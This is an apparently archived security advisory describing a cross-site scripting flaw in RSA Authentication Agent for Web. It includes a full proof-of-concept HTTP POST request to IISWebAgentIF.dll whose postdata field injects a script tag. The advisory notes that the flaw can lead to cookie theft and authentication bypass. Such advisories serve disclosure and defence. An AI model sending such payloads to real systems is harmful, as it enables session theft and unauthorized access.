20 lines
No EOL
1.2 KiB
Text
20 lines
No EOL
1.2 KiB
Text
source: https://www.securityfocus.com/bid/13168/info
|
|
|
|
A remote cross-site scripting vulnerability affects the RSA Security RSA Authentication Agent for Web. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated Web content.
|
|
|
|
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks, due to the nature of the application, bypassing authentication requirements may be possible.
|
|
|
|
POST /WebID/IISWebAgentIF.dll HTTP/1.0
|
|
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
|
|
application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword,
|
|
application/x-shockwave-flash, */*
|
|
Accept-Language: de
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Connection: Keep-Alive
|
|
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
|
|
Host: www.example.com
|
|
Cache-Control: no-cache
|
|
Referer: https://www.example.com/
|
|
Content-Length: 135
|
|
|
|
stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata="><script>alert("Vulnerable")</script>&authntype=2&username=asdf&passcode=jkl%F6 |